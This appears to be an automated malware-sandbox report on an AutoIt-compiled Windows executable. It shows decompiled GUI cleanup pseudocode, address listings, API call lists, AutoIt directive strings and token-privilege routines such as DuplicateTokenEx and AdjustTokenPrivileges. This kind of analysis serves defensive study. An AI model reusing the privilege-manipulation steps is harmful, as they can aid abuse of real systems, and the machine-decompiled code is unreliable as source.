						SendMessageW(_t345[0xd], 0x1101, 0, _t345[4]);
						L8:
						_t350 = _v96;
						L9:
						if(_t345[0x11] != 0) {
							DeleteObject(_t345[0x11]);
						}
						if(_t345[0x19] != 0) {
							DeleteObject(_t345[0x19]);
						}
						if(_t345[0x1a] != 0) {
							DestroyIcon(_t345[0x1a]);
						}
						if(_t345[0x14] != 0) {
							DestroyWindow(_t345[0x14]);
						}
						_t204 = _v96;
						if(_v96 == _t350[7]) {
							_t350[7] = _v100;
						}
						E00AB283D(_t309, _t309, _t204);
						_t193 = 1;
						goto L15;
					}
					__eflags = _t198 - 0xc;
					if(__eflags > 0) {
						__eflags = _t198 - 0xe;
						if(_t198 < 0xe) {
							L7:
							DestroyWindow( *_t345);
							goto L8;
						}
						__eflags = _t198 - 0xf;
						if(_t198 <= 0xf) {
							__eflags = _t337 - 0xe;
							if(_t337 != 0xe) {
								L99:
								_t208 = DeleteMenu(_t345[3], _t348, 0);
								__eflags = _t208;
								if(_t208 != 0) {
									_t350 = _v96;
								} else {
									_t350 = _v96;
									DeleteMenu(_t350[0x67], _t348, _t208);
								}
								_t209 = _t350[0x67];
								__eflags = _t209;
								if(_t209 != 0) {
									_t211 = GetMenuItemCount(_t209);
									__eflags = _t211;
									if(_t211 == 0) {
										SetMenu( *_t350, _t211);
										DestroyMenu(_t350[0x67]);
										_t149 =  &(_t350[0x67]);
										 *_t149 = _t350[0x67] & 0x00000000;
										__eflags =  *_t149;
									}
								}
								DrawMenuBar( *_t350);
								goto L9;
							}
							_v52 = 0x30;
							E00AD3010( &_v48, 0, 0x2c);
							_v48 = 4;
							_t218 = GetMenuItemInfoW(_t345[3], _t348, 0,  &_v52);
							__eflags = _t218;
							if(_t218 == 0) {
								goto L99;
							}
							_t316 = _v32;
							_v80 = _t316;
							__eflags = _t316;
							if(_t316 == 0) {
								goto L99;
							}
							_t351 = 3;
							__eflags =  *((intOrPtr*)(_t309 + 0x84)) - _t351;
							if( *((intOrPtr*)(_t309 + 0x84)) < _t351) {
								L98:
								_t348 = _a4;
								goto L99;
							} else {
								goto L93;
							}
							do {
								L93:
								_t221 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t351 * 4));
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *((intOrPtr*)(_t221 + 0xc)) - _t316;
									if( *((intOrPtr*)(_t221 + 0xc)) == _t316) {
										__eflags =  *((char*)(_t221 + 0x90)) - 0xf;
										if( *((char*)(_t221 + 0x90)) == 0xf) {
											E00AB283D(_t309, _t309, _t351);
											_t316 = _v84;
										}
									}
								}
								_t351 = _t351 + 1;
								__eflags = _t351 -  *((intOrPtr*)(_t309 + 0x84));
							} while (_t351 <=  *((intOrPtr*)(_t309 + 0x84)));
							goto L98;
						}
						__eflags = _t198 - 0x10;
						if(_t198 != 0x10) {
							goto L7;
						}
						__eflags = _t345[0x10];
						if(_t345[0x10] != 0) {
							ImageList_Destroy(_t345[0x10]);
						}
						_t352 = 3;
						__eflags =  *((intOrPtr*)(_t309 + 0x84)) - _t352;
						if( *((intOrPtr*)(_t309 + 0x84)) >= _t352) {
							do {
								_t318 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t352 * 4));
								__eflags = _t318;
								if(_t318 != 0) {
									__eflags =  *((intOrPtr*)(_t318 + 0x34)) -  *_t345;
									if( *((intOrPtr*)(_t318 + 0x34)) ==  *_t345) {
										__eflags =  *((char*)(_t318 + 0x90)) - 0x11;
										if( *((char*)(_t318 + 0x90)) == 0x11) {
											E00AB283D(_t309, _t309, _t352);
										}
									}
								}
								_t352 = _t352 + 1;
								__eflags = _t352 -  *((intOrPtr*)(_t309 + 0x84));
							} while (_t352 <=  *((intOrPtr*)(_t309 + 0x84)));
						}
						goto L7;
					}
					if(__eflags == 0) {
						_t353 = 3;
						__eflags =  *(__ecx + 0x84) - _t353;
						if( *(__ecx + 0x84) < _t353) {
							L74:
							_t228 =  *(_t313 + 0x1a0);
							__eflags = _t345[3] - _t228;
							if(_t345[3] != _t228) {
								DestroyMenu(_t345[3]);
								goto L8;
							}
							DestroyMenu(_t228);
							_t350 = _v96;
							_t350[0x68] = _t350[0x68] & 0x00000000;
							goto L9;
						} else {
							goto L66;
						}
						do {
							L66:
							_t320 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t353 * 4));
							__eflags = _t320;
							if(_t320 == 0) {
								goto L72;
							}
							__eflags =  *(_t320 + 0xc) - _t345[3];
							if( *(_t320 + 0xc) != _t345[3]) {
								goto L72;
							}
							_t234 =  *((intOrPtr*)(_t320 + 0x90));
							__eflags = _t234 - 0xf;
							if(_t234 == 0xf) {
								L71:
								E00AB283D(_t309, _t309, _t353);
								goto L72;
							}
							__eflags = _t234 - 0xe;
							if(_t234 == 0xe) {
								goto L71;
							}
							 *(_t320 + 0xc) =  *(_t320 + 0xc) & 0x00000000;
							L72:
							_t353 = _t353 + 1;
							__eflags = _t353 -  *((intOrPtr*)(_t309 + 0x84));
						} while (_t353 <=  *((intOrPtr*)(_t309 + 0x84)));
						_t313 = _v96;
						goto L74;
					}
					__eflags = _t198 - 2;
					if(_t198 < 2) {
						goto L7;
					}
					_t354 = 3;
					__eflags = _t198 - _t354;
					if(_t198 <= _t354) {
						_t236 =  *(_t313 + 0x1c4);
						__eflags = _t236;
						if(_t236 > 0) {
							__eflags = _a4 - _t236;
							if(_a4 == _t236) {
								 *(_t313 + 0x1c4) =  *(_t313 + 0x1c4) & 0x00000000;
							}
						}
						goto L7;
					}
					__eflags = _t198 - 0xa;
					if(_t198 == 0xa) {
						_t237 =  *(__ecx + 0x84);
						__eflags = _t237 - _t354;
						if(_t237 < _t354) {
							L60:
							_t338 = _v92;
							 *(_t313 + 0x188) = 0;
							 *((intOrPtr*)(_t313 + 0x18c)) = _t338;
							 *((intOrPtr*)(_t313 + 0x190)) = _t338;
							 *((intOrPtr*)(_t313 + 0x194)) = 0;
							 *((char*)(_t313 + 0x198)) = 0;
							DestroyWindow( *_t345);
							__eflags = _t345[0x10];
							if(_t345[0x10] != 0) {
								ImageList_Destroy(_t345[0x10]);
							}
							goto L8;
						}
						_t346 = _t237;
						do {
							_t243 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t346 * 4));
							__eflags = _t243;
							if(_t243 != 0) {
								__eflags =  *((char*)(_t243 + 0x90)) - 0xb;
								if( *((char*)(_t243 + 0x90)) == 0xb) {
									E00AB2FE8(_t309, _t346);
								}
							}
							_t346 = _t346 - 1;
							__eflags = _t346 - _t354;
						} while (_t346 >= _t354);
						_t345 = _v80;
						_t313 = _v96;
						goto L60;
					}
					__eflags = _t198 - 0xb;
					if(_t198 != 0xb) {
						goto L7;
					} else {
						_v84 =  *((intOrPtr*)(_t313 + 0x190));
						SendMessageW( *(_t313 + 0x188), 0x1308, _t345[0x24] & 0x000000ff, 0);
						_t325 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x74)) + E00AB29AB(_t309, _v96[0x62]) * 4)))) + 0x40);
						__eflags = _t325;
						if(_t325 != 0) {
							_t275 = _t345[0x22] & 0x0000ffff;
							__eflags = _t275 - _v92;
							if(_t275 != _v92) {
								ImageList_Remove(_t325, _t275);
							}
						}
						__eflags =  *((intOrPtr*)(_t309 + 0x84)) - _t354;
						if( *((intOrPtr*)(_t309 + 0x84)) < _t354) {
							L47:
							_t326 = _v84;
							_t350 = _v96;
							__eflags = (_t345[0x24] & 0x000000ff) - _t326;
							if((_t345[0x24] & 0x000000ff) != _t326) {
								_t350[0x64] = _v92;
								__eflags = _t326 - (_t345[0x24] & 0x000000ff);
								if(_t326 <= (_t345[0x24] & 0x000000ff)) {
									L52:
									_t345[0x24] = 0xff;
									E00B3BD10(_t309, _t350, _t326);
									_t350[0x63] = _t350[0x63] - 1;
									_t350[0x65] = _t350[0x65] & 0x00000000;
									goto L9;
								}
								L51:
								__eflags = _t326;
								goto L52;
							}
							__eflags = _t326 - _t350[0x63];
							if(_t326 == _t350[0x63]) {
								goto L51;
							} else {
								goto L52;
							}
						} else {
							goto L33;
						}
						do {
							L33:
							_t328 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t354 * 4));
							__eflags = _t328;
							if(_t328 == 0) {
								goto L46;
							}
							_t259 =  *(_t328 + 0x93);
							__eflags = _t259 - 0xff;
							if(_t259 == 0xff) {
								goto L46;
							}
							_t339 = _t345[0x24];
							__eflags = _t259 - _t339;
							if(__eflags != 0) {
								L39:
								if(__eflags > 0) {
									_t273 = _t259 - 1;
									__eflags = _t273;
									 *(_t328 + 0x93) = _t273;
								}
								_t340 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t354 * 4));
								__eflags =  *((char*)(_t340 + 0x90)) - 0xb;
								if( *((char*)(_t340 + 0x90)) == 0xb) {
									_t329 = _t345[0x22] & 0x0000ffff;
									__eflags = _t329;
									if(_t329 >= 0) {
										_t262 =  *(_t340 + 0x88) & 0x0000ffff;
										__eflags = _t262;
										if(_t262 >= 0) {
											__eflags = _t262 - _t329;
											if(_t262 > _t329) {
												_t263 = _t262 - 1;
												__eflags = _t263;
												_v52 = 2;
												 *(_t340 + 0x88) = _t263;
												_t330 =  *((intOrPtr*)(_t309 + 0x74));
												_v32 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t330 + _t354 * 4)))) + 0x88));
												SendMessageW(_v96[0x62], 0x133d,  *( *((intOrPtr*)( *((intOrPtr*)(_t330 + _t354 * 4)))) + 0x93) & 0x000000ff,  &_v52);
											}
										}
									}
								}
								goto L46;
							}
							__eflags =  *((char*)(_t328 + 0x90)) - 0xb;
							if( *((char*)(_t328 + 0x90)) == 0xb) {
								__eflags = _t259 - _t339;
								goto L39;
							} else {
								E00AB2FE8(_t309, _t354);
							}
							L46:
							_t354 = _t354 + 1;
							__eflags = _t354 -  *((intOrPtr*)(_t309 + 0x84));
						} while (_t354 <=  *((intOrPtr*)(_t309 + 0x84)));
						goto L47;
					}
				}
				_t278 = _t198 - 0x13;
				if(_t278 == 0) {
					__eflags = _t345[0xe];
					_t355 = ImageList_Destroy;
					if(_t345[0xe] != 0) {
						ImageList_Destroy(_t345[0xe]);
					}
					__eflags = _t345[0xf];
					if(_t345[0xf] != 0) {
						 *_t355(_t345[0xf]);
					}
					_t356 = 3;
					__eflags =  *((intOrPtr*)(_t309 + 0x84)) - _t356;
					if( *((intOrPtr*)(_t309 + 0x84)) >= _t356) {
						do {
							_t341 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t356 * 4));
							__eflags = _t341;
							if(_t341 != 0) {
								_t332 = _v96;
								__eflags =  *((intOrPtr*)(_t341 + 4)) - _t332[1];
								if( *((intOrPtr*)(_t341 + 4)) == _t332[1]) {
									__eflags =  *((char*)(_t341 + 0x90)) - 0x14;
									if( *((char*)(_t341 + 0x90)) == 0x14) {
										__eflags =  *((intOrPtr*)(_t341 + 0x34)) -  *_t345;
										if( *((intOrPtr*)(_t341 + 0x34)) ==  *_t345) {
											E00AB2FE8(_t309, _t356);
										}
									}
								}
							}
							_t356 = _t356 + 1;
							__eflags = _t356 -  *((intOrPtr*)(_t309 + 0x84));
						} while (_t356 <=  *((intOrPtr*)(_t309 + 0x84)));
					}
					goto L7;
				}
				_t286 = _t278 - 1;
				if(_t286 == 0) {
					_v68 = _t348;
					_v76 = 1;
					_t288 = SendMessageW(_t345[0xd], 0x1053, _v92,  &_v76);
					__eflags = _t288 - _v92;
					if(_t288 == _v92) {
						goto L16;
					}
					SendMessageW(_t345[0xd], 0x1008, _t288, 0);
					goto L8;
				}
				_t291 = _t286;
				if(_t291 == 0) {
					_t358 = 3;
					__eflags =  *(__ecx + 0x84) - _t358;
					if( *(__ecx + 0x84) < _t358) {
						goto L7;
					} else {
						goto L110;
					}
					while(1) {
						L110:
						_t342 =  *( *( *((intOrPtr*)(_t309 + 0x74)) + _t358 * 4));
						__eflags = _t342;
						if(_t342 == 0) {
							goto L115;
						}
						__eflags =  *((intOrPtr*)(_t342 + 4)) -  *((intOrPtr*)(_t313 + 4));
						if( *((intOrPtr*)(_t342 + 4)) !=  *((intOrPtr*)(_t313 + 4))) {
							goto L115;
						}
						__eflags =  *((char*)(_t342 + 0x90)) - 3;
						if( *((char*)(_t342 + 0x90)) != 3) {
							goto L115;
						}
						__eflags = _t342->i - _t345[0xd];
						if(_t342->i != _t345[0xd]) {
							goto L115;
						}
						MoveWindow( *( *( *( *((intOrPtr*)(_t309 + 0x74)) + _t358 * 4))), ( *( *( *((intOrPtr*)(_t309 + 0x74)) + _t358 * 4)))[0x22], ( *( *( *((intOrPtr*)(_t309 + 0x74)) + _t358 * 4)))[0x22],  *(_t334 + 0x8c),  *(_t334 + 0x8e), 0);
						goto L7;
						L115:
						_t358 = _t358 + 1;
						__eflags = _t358 -  *((intOrPtr*)(_t309 + 0x84));
						if(_t358 >  *((intOrPtr*)(_t309 + 0x84))) {
							goto L7;
						}
					}
				}
				_t303 = _t291 - 5;
				if(_t303 != 0) {
					__eflags = _t303 != 0;
					if(_t303 != 0) {
						goto L7;
					}
					E00B3AA7A(__ecx, _t345, _t313);
					goto L8;
				} else {
					E00AB1F1D(_t313, _t345);
					goto L7;
				}
			}

0x00ab2ff7
0x00ab2ffa
0x00ab300b
0x00ab30b1
0x00ab30b1
0x00ab30a8
0x00ab30ae
0x00ab30ae
0x00ab301c
0x00ab3024
0x00ab3029
0x00ab3030
0x00ab3032
0x00ab3036
0x00ab303c
0x00ab3042
0x00aec722
0x00aecb5e
0x00ab3078
0x00ab3078
0x00ab307c
0x00ab3080
0x00ab30b8
0x00ab30b8
0x00ab3086
0x00ab30c3
0x00ab30c3
0x00ab308c
0x00ab30ce
0x00ab30ce
0x00ab3092
0x00ab30d9
0x00ab30d9
0x00ab3094
0x00ab309b
0x00ab30e5
0x00ab30e5
0x00ab30a0
0x00ab30a7
0x00000000
0x00ab30a7
0x00aec728
0x00aec72b
0x00aeca00
0x00aeca03
0x00ab3070
0x00ab3072
0x00000000
0x00ab3072
0x00aeca09
0x00aeca0c
0x00aeca67
0x00aeca6a
0x00aecaeb
0x00aecaf1
0x00aecaf7
0x00aecaf9
0x00aecb0f
0x00aecafb
0x00aecafd
0x00aecb07
0x00aecb07
0x00aecb13
0x00aecb19
0x00aecb1b
0x00aecb1e
0x00aecb24
0x00aecb26
0x00aecb2b
0x00aecb37
0x00aecb3d
0x00aecb3d
0x00aecb3d
0x00aecb3d
0x00aecb26
0x00aecb46
0x00000000
0x00aecb46
0x00aeca72
0x00aeca7d
0x00aeca85
0x00aeca98
0x00aeca9e
0x00aecaa0
0x00000000
0x00000000
0x00aecaa2
0x00aecaa6
0x00aecaaa
0x00aecaac
0x00000000
0x00000000
0x00aecab0
0x00aecab1
0x00aecab7
0x00aecae8
0x00aecae8
0x00000000
0x00000000
0x00000000
0x00000000
0x00aecab9
0x00aecab9
0x00aecabf
0x00aecac1
0x00aecac3
0x00aecac5
0x00aecac8
0x00aecaca
0x00aecad1
0x00aecad6
0x00aecadb
0x00aecadb
0x00aecad1
0x00aecac8
0x00aecadf
0x00aecae0
0x00aecae0
0x00000000
0x00aecab9
0x00aeca0e
0x00aeca11
0x00000000
0x00000000
0x00aeca17
0x00aeca1b
0x00aeca20
0x00aeca20
0x00aeca28
0x00aeca29
0x00aeca2f
0x00aeca35
0x00aeca3b
0x00aeca3d
0x00aeca3f
0x00aeca44
0x00aeca46
0x00aeca48
0x00aeca4f
0x00aeca54
0x00aeca54
0x00aeca4f
0x00aeca46
0x00aeca59
0x00aeca5a
0x00aeca5a
0x00aeca62
0x00000000
0x00aeca2f
0x00aec731
0x00aec98a
0x00aec98b
0x00aec991
0x00aec9d0
0x00aec9d0
0x00aec9d6
0x00aec9d9
0x00aec9f5
0x00000000
0x00aec9f5
0x00aec9dc
0x00aec9e2
0x00aec9e6
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec993
0x00aec993
0x00aec999
0x00aec99b
0x00aec99d
0x00000000
0x00000000
0x00aec9a2
0x00aec9a5
0x00000000
0x00000000
0x00aec9a7
0x00aec9ad
0x00aec9af
0x00aec9bb
0x00aec9be
0x00000000
0x00aec9be
0x00aec9b1
0x00aec9b3
0x00000000
0x00000000
0x00aec9b5
0x00aec9c3
0x00aec9c3
0x00aec9c4
0x00aec9c4
0x00aec9cc
0x00000000
0x00aec9cc
0x00aec737
0x00aec73a
0x00000000
0x00000000
0x00aec742
0x00aec743
0x00aec745
0x00aec965
0x00aec96b
0x00aec96d
0x00aec973
0x00aec976
0x00aec97c
0x00aec97c
0x00aec976
0x00000000
0x00aec96d
0x00aec74b
0x00aec74e
0x00aec8eb
0x00aec8f1
0x00aec8f3
0x00aec921
0x00aec921
0x00aec927
0x00aec92d
0x00aec933
0x00aec939
0x00aec93f
0x00aec947
0x00aec94d
0x00aec951
0x00aec95a
0x00aec95a
0x00000000
0x00aec951
0x00aec8f5
0x00aec8f7
0x00aec8fd
0x00aec8ff
0x00aec901
0x00aec903
0x00aec90a
0x00aec90f
0x00aec90f
0x00aec90a
0x00aec914
0x00aec915
0x00aec915
0x00aec919
0x00aec91d
0x00000000
0x00aec91d
0x00aec754
0x00aec757
0x00000000
0x00aec75d
0x00aec765
0x00aec77c
0x00aec79d
0x00aec7a0
0x00aec7a2
0x00aec7a4
0x00aec7ab
0x00aec7b0
0x00aec7b5
0x00aec7b5
0x00aec7b0
0x00aec7bb
0x00aec7c1
0x00aec896
0x00aec89d
0x00aec8a1
0x00aec8a5
0x00aec8a7
0x00aec8b7
0x00aec8c4
0x00aec8c6
0x00aec8c9
0x00aec8cd
0x00aec8d4
0x00aec8d9
0x00aec8df
0x00000000
0x00aec8df
0x00aec8c8
0x00aec8c8
0x00000000
0x00aec8c8
0x00aec8a9
0x00aec8af
0x00000000
0x00aec8b1
0x00000000
0x00aec8b1
0x00000000
0x00000000
0x00000000
0x00aec7c7
0x00aec7c7
0x00aec7cd
0x00aec7cf
0x00aec7d1
0x00000000
0x00000000
0x00aec7d7
0x00aec7dd
0x00aec7df
0x00000000
0x00000000
0x00aec7e5
0x00aec7eb
0x00aec7ed
0x00aec807
0x00aec807
0x00aec809
0x00aec809
0x00aec80b
0x00aec80b
0x00aec817
0x00aec819
0x00aec820
0x00aec822
0x00aec829
0x00aec82c
0x00aec82e
0x00aec835
0x00aec838
0x00aec83a
0x00aec83d
0x00aec83f
0x00aec83f
0x00aec840
0x00aec848
0x00aec84f
0x00aec85e
0x00aec883
0x00aec883
0x00aec83d
0x00aec838
0x00aec82c
0x00000000
0x00aec820
0x00aec7ef
0x00aec7f6
0x00aec805
0x00000000
0x00aec7f8
0x00aec7fb
0x00aec7fb
0x00aec889
0x00aec889
0x00aec88a
0x00aec88a
0x00000000
0x00aec7c7
0x00aec757
0x00ab3048
0x00ab304b
0x00aecc39
0x00aecc3d
0x00aecc43
0x00aecc48
0x00aecc48
0x00aecc4a
0x00aecc4e
0x00aecc53
0x00aecc53
0x00aecc57
0x00aecc58
0x00aecc5e
0x00aecc64
0x00aecc6a
0x00aecc6c
0x00aecc6e
0x00aecc70
0x00aecc77
0x00aecc7a
0x00aecc7c
0x00aecc83
0x00aecc88
0x00aecc8a
0x00aecc8f
0x00aecc8f
0x00aecc8a
0x00aecc83
0x00aecc7a
0x00aecc94
0x00aecc95
0x00aecc95
0x00aecc9d
0x00000000
0x00aecc5e
0x00ab3051
0x00ab3052
0x00aecbfc
0x00aecc0b
0x00aecc1b
0x00aecc1d
0x00aecc21
0x00000000
0x00000000
0x00aecc32
0x00000000
0x00aecc32
0x00ab3059
0x00ab305a
0x00aecb81
0x00aecb82
0x00aecb88
0x00000000
0x00000000
0x00000000
0x00000000
0x00aecb8e
0x00aecb8e
0x00aecb94
0x00aecb96
0x00aecb98
0x00000000
0x00000000
0x00aecb9d
0x00aecba0
0x00000000
0x00000000
0x00aecba2
0x00aecba9
0x00000000
0x00000000
0x00aecbad
0x00aecbb0
0x00000000
0x00000000
0x00aecbde
0x00000000
0x00aecbe9
0x00aecbe9
0x00aecbea
0x00aecbf0
0x00000000
0x00000000
0x00aecbf6
0x00aecb8e
0x00ab3060
0x00ab3063
0x00aecb6a
0x00aecb6b
0x00000000
0x00000000
0x00aecb75
0x00000000
0x00ab3069
0x00ab306b
0x00000000
0x00ab306b

APIs

DestroyWindow.USER32(?,?,?), ref: 00AB3072
DeleteObject.GDI32(00000000), ref: 00AB30B8
DeleteObject.GDI32(00000000), ref: 00AB30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00AB30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00AB30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00AEC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AEC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AECBDE

Part of subcall function 00AB1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB2412,?,00000000,?,?,?,?,00AB1AA7,00000000,?), ref: 00AB1F76

SendMessageW.USER32(?,00001053), ref: 00AECC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AECC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00AECC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00AECC53

Strings

0, xrefs: 00AECA72

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: abebd1d6b39bfc806f6c4f4aa2b53e3ee9499a82473064ea6f5e0638b5bb532a
Instruction ID: d4d4ca96e3ea226271904288b5ce04ca0f4811c062edd76521b0c2fb286d14ae
Opcode Fuzzy Hash: abebd1d6b39bfc806f6c4f4aa2b53e3ee9499a82473064ea6f5e0638b5bb532a
Instruction Fuzzy Hash: EF12BD31604281EFDB24EF25C984BA9BBB5FF05320F144569F989CB262CB31ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC27FC, Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

Part of subcall function 00AD0FE6: std::exception::exception.LIBCMT ref: 00AD101C
Part of subcall function 00AD0FE6: __CxxThrowException@8.LIBCMT ref: 00AD1031

__wcsnicmp.LIBCMT ref: 00AC286A
__wcsnicmp.LIBCMT ref: 00AC287E
__wcsnicmp.LIBCMT ref: 00AC2896
__wcsnicmp.LIBCMT ref: 00AC28AE
__wcsnicmp.LIBCMT ref: 00AC28C6
__wcsnicmp.LIBCMT ref: 00AC28DE
__wcsnicmp.LIBCMT ref: 00AC28F6
__wcsnicmp.LIBCMT ref: 00AC290A
__wcsnicmp.LIBCMT ref: 00AC2948
__wcsnicmp.LIBCMT ref: 00AC295C
__wcsnicmp.LIBCMT ref: 00AC2970
__wcsnicmp.LIBCMT ref: 00AC2984

Strings

Bad directive syntax error, xrefs: 00AFFBD3, 00AFFBF0
#include-once, xrefs: 00AC28C0
Unterminated group of comments, xrefs: 00AFFCFA
#cs, xrefs: 00AC2904, 00AC2956
Cannot parse #include, xrefs: 00AFFCE5
#OnAutoItStartRegister, xrefs: 00AC28A8
', xrefs: 00AFFB9F
", xrefs: 00AFFB89
#include, xrefs: 00AC28D8
#notrayicon, xrefs: 00AC2878
#ce, xrefs: 00AC297E
#pragma compile, xrefs: 00AC2864
#comments-start, xrefs: 00AC28F0, 00AC2942
#requireadmin, xrefs: 00AC2890
#comments-end, xrefs: 00AC296A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp$Exception@8Throw_mallocstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1206783495-1645009161
Opcode ID: 268f413004bd908878907c2a452b3ff29e4c6662c52c898912f3b81fbee8c4b7
Instruction ID: 2baaaf45c21517bcfe1a05e86f63d9e320702b9631932cf1b94cb66eb8b33935
Opcode Fuzzy Hash: 268f413004bd908878907c2a452b3ff29e4c6662c52c898912f3b81fbee8c4b7
Instruction Fuzzy Hash: DCA1CF31A40209BBCF20AF64DD92FBE37B4AF45740F15006DF906AB2A2EBB19E41D751

Uniqueness

Uniqueness Score: -1.00%

Function 00B3AF18, Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B3AF51
SetTextColor.GDI32(?,?), ref: 00B3AF55
GetSysColorBrush.USER32(0000000F), ref: 00B3AF6B
GetSysColor.USER32(0000000F), ref: 00B3AF76
CreateSolidBrush.GDI32(?), ref: 00B3AF7B
GetSysColor.USER32(00000011), ref: 00B3AF93
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B3AFA1
SelectObject.GDI32(?,00000000), ref: 00B3AFB2
SetBkColor.GDI32(?,00000000), ref: 00B3AFBB
SelectObject.GDI32(?,?), ref: 00B3AFC8
InflateRect.USER32(?,000000FF,000000FF), ref: 00B3AFE7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B3AFFE
GetWindowLongW.USER32(00000000,000000F0), ref: 00B3B013
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B3B05F
GetWindowTextW.USER32 ref: 00B3B086
InflateRect.USER32(?,000000FD,000000FD), ref: 00B3B0A4
DrawFocusRect.USER32 ref: 00B3B0AF
GetSysColor.USER32(00000011), ref: 00B3B0BD
SetTextColor.GDI32(?,00000000), ref: 00B3B0C5
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B3B0D9
SelectObject.GDI32(?,00B3AC1F), ref: 00B3B0F0
DeleteObject.GDI32(?), ref: 00B3B0FB
SelectObject.GDI32(?,?), ref: 00B3B101
DeleteObject.GDI32(?), ref: 00B3B106
SetTextColor.GDI32(?,?), ref: 00B3B10C
SetBkColor.GDI32(?,?), ref: 00B3B116

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 8f1d6dbbde5babc27fa70e681bce5850924ada051b1281148a8275851c70617b
Instruction ID: bfe9cfec6b53b8d6c37774c8d1a071ac69a74da97d76415aae16b7cb0e713082
Opcode Fuzzy Hash: 8f1d6dbbde5babc27fa70e681bce5850924ada051b1281148a8275851c70617b
Instruction Fuzzy Hash: 76615C75910218BFDF11AFA4DC48EAE7BB9FF09320F214155FA15AB2A1DB719A40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B08F2E, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00B09399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B093E3
Part of subcall function 00B09399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B09410
Part of subcall function 00B09399: GetLastError.KERNEL32 ref: 00B0941D

_memset.LIBCMT ref: 00B08F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B08FC3
CloseHandle.KERNEL32(?), ref: 00B08FD4
OpenWindowStationW.USER32 ref: 00B08FEB
GetProcessWindowStation.USER32 ref: 00B09004
SetProcessWindowStation.USER32(00000000), ref: 00B0900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B09028

Part of subcall function 00B08DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B08F27), ref: 00B08DFE
Part of subcall function 00B08DE9: CloseHandle.KERNEL32(?,?,00B08F27), ref: 00B08E10

Strings

, xrefs: 00B08F80
default, xrefs: 00B09023
winsta0, xrefs: 00B08FE6

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
